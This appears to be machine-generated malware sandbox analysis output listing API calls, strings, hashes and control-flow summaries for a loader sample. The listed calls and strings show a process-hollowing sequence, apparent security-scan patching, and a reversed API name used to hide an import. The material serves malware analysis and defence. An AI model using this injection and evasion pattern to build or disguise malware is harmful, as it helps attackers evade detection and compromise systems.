                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e4c9db96069a22703ffb4937d6ae98865e839ca628e0b5b592ae251e8bb8a0a6
                                                                                          • Instruction ID: d03f12c367e5b6c96fcace86eb0b8ca49796b4ab9b035de8321a34eca60ed2d1
                                                                                          • Opcode Fuzzy Hash: e4c9db96069a22703ffb4937d6ae98865e839ca628e0b5b592ae251e8bb8a0a6
                                                                                          • Instruction Fuzzy Hash: 8AD0A930641841EBEF0AFF24CA24EAE3FB0FB20681B4000B8E700A2030E339CC01DA18
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                          • Instruction ID: 6682dd786bee6f988ffb520947b0165976ab6ece301ada6c22b40217d847e95c
                                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                          • Instruction Fuzzy Hash: B7D012371D054CBBCB119F65DC01F957FA9E765BA0F444020F504875A1C63AE950D684
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Strings
• ExecuteOptions, xrefs: 2A0B46A0
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 2A0B46FC
• CLIENT(ntdll): Processing section info %ws..., xrefs: 2A0B4787
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 2A0B4725
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 2A0B4655
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 2A0B4742
• Execute=1, xrefs: 2A0B4713
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 2A0B02BD
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 2A0B02E7
• RTL: Re-Waiting, xrefs: 2A0B031E
Strings
• RTL: Resource at %p, xrefs: 2A0B7B8E
• RTL: Re-Waiting, xrefs: 2A0B7BAC
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 2A0B7B7F
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A0B728C
Strings
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 2A0B7294
• RTL: Resource at %p, xrefs: 2A0B72A3
• RTL: Re-Waiting, xrefs: 2A0B72C1
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
                                                                                          Similarity
                                                                                          • API ID: __aulldvrm
                                                                                          • String ID: +$-
                                                                                          • API String ID: 1302938615-2137968064
                                                                                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                          • Instruction ID: 96797a6cbe6e365653229dc5b04d28e43ae3964c79240fa6689e8fcdf76b0143
                                                                                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                          • Instruction Fuzzy Hash: 1691B6F0E00219DFDB14EF69D890AAEB7F5AF44360F11453AE954E72CADB70A9508B18
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@
                                                                                          • API String ID: 0-1194432280
                                                                                          • Opcode ID: 7a2090df976c3dc25ce2b986f36c9de68792a72ea8eb93ef36095766b5f5a6e6
                                                                                          • Instruction ID: 12d47620b4054f99338b1883d38466e65b41e7e5ef2107cde9eb7954387237f3
                                                                                          • Opcode Fuzzy Hash: 7a2090df976c3dc25ce2b986f36c9de68792a72ea8eb93ef36095766b5f5a6e6
                                                                                          • Instruction Fuzzy Hash: 89813872D012699BDB219BA4CC44BDEB7B4BB08750F0141FAEA19B7251D7309E808FA0

                                                                                          Execution Graph

                                                                                          Execution Coverage:9.3%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:187
                                                                                          Total number of Limit Nodes:17
[Execution graph: the node/edge listing emitted by the interactive graph widget is not reproduced here. API calls that appear as graph nodes: Sleep, VirtualAlloc, VirtualFree, timeSetEvent, LoadLibraryW, GetProcAddress, NtWriteVirtualMemory, FreeLibrary, TlsGetValue, GetModuleHandleA, SysAllocStringLen, SysFreeString, GetStdHandle, WriteFile, MessageBoxA, ExitProcess, GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpyn, lstrlen, GetThreadLocale, GetLocaleInfoA, LoadLibraryExA.]

                                                                                          Control-flow Graph

[Control-flow graph for function 02888BAE: the basic-block/edge listing emitted by the interactive graph widget is not reproduced here. API calls that appear as graph nodes: GetThreadContext, SetThreadContext, NtResumeThread; the remaining nodes are internal subcalls (e.g. 0287480C, 0287494C, 028746A4, 02874798, 02888824, 02887D00, 028887A0).]
                                                                                          APIs
                                                                                            • Part of subcall function 02888824: FreeLibrary.KERNEL32(028D1384,00000000,028D1388,Function_000055D8,00000004,028D1398,028D1388,05F5E0FF,00000040,028D139C,028D1384,00000000,00000000,00000000,00000000,0288890B), ref: 028888EB
                                                                                            • Part of subcall function 028885DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02888668
                                                                                          • GetThreadContext.KERNEL32(028D13D0,028D1420,ScanString,028D13A4,0288A77C,UacInitialize,028D13A4,0288A77C,ScanBuffer,028D13A4,0288A77C,ScanBuffer,028D13A4,0288A77C,UacInitialize,028D13A4), ref: 02889442
                                                                                            • Part of subcall function 02888254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028882C5
                                                                                            • Part of subcall function 028884C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02888529
                                                                                            • Part of subcall function 028879B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02887A27
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                          • API String ID: 3386062106-51457883
                                                                                          • Opcode ID: 40d71927330bc379f29349049f94ec996cc097ec855a43c506e70c6c5d496068
                                                                                          • Instruction ID: 35c2f8f8f8d3c4efbe6dfc9c319832aeb8a77bde75feb22805ed047b09b5a217
                                                                                          • Opcode Fuzzy Hash: 40d71927330bc379f29349049f94ec996cc097ec855a43c506e70c6c5d496068
                                                                                          • Instruction Fuzzy Hash: 39E21B3CB501189BDB15FBA8DC90BDE73BAAF88310F1040A2E149EB255DB74EE459F52

                                                                                          Control-flow Graph

[Control-flow graph for function 02875A78: the basic-block/edge listing emitted by the interactive graph widget is not reproduced here. API calls that appear as graph nodes: GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpyn, GetThreadLocale, GetLocaleInfoA, lstrlen, LoadLibraryExA.]
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02875A94
                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02875AB2
                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02875AD0
                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02875AEE
                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02875B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02875B37
                                                                                          • RegQueryValueExA.ADVAPI32(?,02875CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02875B7D,?,80000001), ref: 02875B55
                                                                                          • RegCloseKey.ADVAPI32(?,02875B84,00000000,00000000,00000005,00000000,02875B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02875B77
                                                                                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02875B94
                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02875BA1
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02875BA7
                                                                                          • lstrlen.KERNEL32(00000000), ref: 02875BD2
                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02875C19
                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02875C29
                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02875C51
                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02875C61
                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02875C87
                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02875C97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                          • API String ID: 1759228003-3917250287
                                                                                          • Opcode ID: 666b25e4006fc8f95304b964b37a105091906bf27f6b8aea9c2b136e1835e2bb
                                                                                          • Instruction ID: e6e403bec9e94873c8abd5b12b7e319f8760e6cc5c6d54727820e7bc27cac630
                                                                                          • Opcode Fuzzy Hash: 666b25e4006fc8f95304b964b37a105091906bf27f6b8aea9c2b136e1835e2bb
                                                                                          • Instruction Fuzzy Hash: 2751887DE4020C7EFB21D6A8CC46FEFB7AD9B14744F8001A5AA08E6581DB78DA448F61

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 02888020: GetModuleHandleA.KERNELBASE(?), ref: 02888072
                                                                                            • Part of subcall function 028880C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0288811B
                                                                                            • Part of subcall function 028880C8: GetProcAddress.KERNEL32(?,?), ref: 0288812D
                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028882C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleMemoryModuleReadVirtual
                                                                                          • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                          • API String ID: 36784810-737317276
                                                                                          • Opcode ID: 7f45a95dae11b79c32b01ba3432b7fd18d0c1df088634c97ebd00d9188f9b7ec
                                                                                          • Instruction ID: 4f2f0dc025739cf894c3535e508c5a5115a2a060797fb226528126bd7a2500b8
                                                                                          • Opcode Fuzzy Hash: 7f45a95dae11b79c32b01ba3432b7fd18d0c1df088634c97ebd00d9188f9b7ec
                                                                                          • Instruction Fuzzy Hash: 2701297D640208AFEB00EFACE885E9E77FEEB48700F958860F504D7640D678E9148B26
                                                                                          APIs
                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0288DB0B
                                                                                          • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0288DB72
                                                                                          • NtClose.NTDLL(?), ref: 0288DB7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$CloseFileNameName_Write
                                                                                          • String ID:
                                                                                          • API String ID: 1792072161-0
                                                                                          • Opcode ID: f76890c3717100617989dbc652406035664a5de31fd3727327c5f567cb965eec
                                                                                          • Instruction ID: 53e93bad58c984d095b57d7a173e094901bbd68f9a1b6830c37619296b96f050
                                                                                          • Opcode Fuzzy Hash: f76890c3717100617989dbc652406035664a5de31fd3727327c5f567cb965eec
                                                                                          • Instruction Fuzzy Hash: F421C179A4130CBAEB10EAE4CD46F9EB7BDEB04B14F604461B605F71D0D7B4AE048A56
                                                                                          APIs
                                                                                          • RtlInitUnicodeString.NTDLL ref: 0288DA6C
                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 0288DA82
                                                                                          • NtDeleteFile.NTDLL(?), ref: 0288DAA1
                                                                                            • Part of subcall function 02874C0C: SysFreeString.OLEAUT32(?), ref: 02874C1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                                                                          • String ID:
                                                                                          • API String ID: 2256775434-0
                                                                                          • Opcode ID: 471cf53e656f75a50fde4933d43ae9d42a3adc43ec3746f2e39a4545dd9a66d6
                                                                                          • Instruction ID: e2e5b2376bcd4b5bbd7c996e18a2478cadd01bb6f07b15dd9936851a36a9b48e
                                                                                          • Opcode Fuzzy Hash: 471cf53e656f75a50fde4933d43ae9d42a3adc43ec3746f2e39a4545dd9a66d6
                                                                                          • Instruction Fuzzy Hash: 2201E17D904208AAEB11FAE4CD51FDEB7BDEB48710F604461A501E2180EB74AB148A65

                                                                                          Control-flow Graph
                                                                                          (graph rendering omitted: executed / not executed basic blocks of the function at 2871a8f, with calls to Sleep and VirtualFree)
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000), ref: 02871B17
                                                                                          • Sleep.KERNEL32(0000000A,00000000), ref: 02871B31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: bf49bfc4f7cf408bb18ee8d5841a6e4a43dd0bcc257bee1e6779da2dee5dd61f
                                                                                          • Instruction ID: 905de3b46379145f443cd8016960b77549830e3df1a2b53192c66da25c26f7af
                                                                                          • Opcode Fuzzy Hash: bf49bfc4f7cf408bb18ee8d5841a6e4a43dd0bcc257bee1e6779da2dee5dd61f
                                                                                          • Instruction Fuzzy Hash: E651DD7DA102408FEB15CF6CC988766BBD1AB45318F2885AED84CCBAC2E770D445CBA1